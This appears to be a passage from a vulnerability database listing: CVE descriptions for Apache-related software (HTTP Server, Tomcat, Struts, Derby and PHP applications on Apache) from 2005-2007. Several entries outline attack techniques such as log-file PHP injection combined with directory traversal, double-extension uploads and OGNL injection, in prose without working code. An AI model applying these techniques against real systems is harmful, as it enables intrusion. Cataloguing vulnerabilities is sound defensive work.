5443| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
5444| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
5445| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
5446| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
5447| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
5448| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
5449| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
5450| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
5451| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
5452| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
5453| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
5454| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
5455| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
5456| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
5457| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
5458| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
5459| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
5460| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
5461| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
5462| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
5463| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
5464| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
5465| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
5466| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
5467| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5468| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5469| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
5470| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
5471| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
5472| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5473| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
5474| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
5475| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
5476| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
5477| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
5478| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
5479| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
5480| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
5481| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
5482| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
5483| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
5484| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
5485| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
5486| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5487| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5488| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
5489| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
5490| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
5491| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
5492| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
5493| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
5494| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
5495| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5496| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
5497| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5498| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
5499| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
5500| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
5501| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5502| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
5503| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5504| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
5505| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
5506| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5507| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
5508| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
5509| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
5510| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
5511| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
5512| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
5513| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
5514| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
5515| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5516| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
5517| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
5518| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
5519| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
5520| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
5521| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
5522| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
5523| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
5524| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
5525| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
5526| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
5527| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
5528| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
5529| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
5530| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
5531| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
5532| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
5533| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
5534| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
5535| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
5536| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
5537| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5538| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5539| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
5540| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
5541| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
5542| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
5543| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
5544| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
5545| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
5546| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
5547| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
5548| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
5549| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
5550| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
5551| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
5552| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
5553| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
5554| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
5555| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
5556| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
5557| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
5558| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
